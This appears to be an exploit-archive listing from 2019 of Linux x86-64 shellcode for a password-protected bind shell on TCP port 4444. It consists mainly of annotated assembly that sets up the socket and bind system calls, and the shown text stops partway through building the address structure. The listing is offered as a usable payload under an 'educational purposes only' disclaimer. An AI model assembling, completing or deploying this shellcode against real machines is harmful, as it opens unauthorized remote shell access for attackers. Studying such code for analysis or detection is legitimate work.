Exploits / Vulnerability Discovered : 2019-08-19 |
Type : shellcode |
Platform : linux_x86-64
This exploit / vulnerability Linux/x86_64 bind (4444/tcp) shell (/bin/sh) + password (pass) shellcode (129 bytes) is for educational purposes only and if it is used you will do on your own risk!
%define pass "pass"
%define port 0x5c11 ; htons(4444)
_start:
jmp real_start
password: db pass
pass_len: db $-password
real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)
syscall
push rax
pop rdi
bind:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; INADDR_ANY = 0
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned
xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2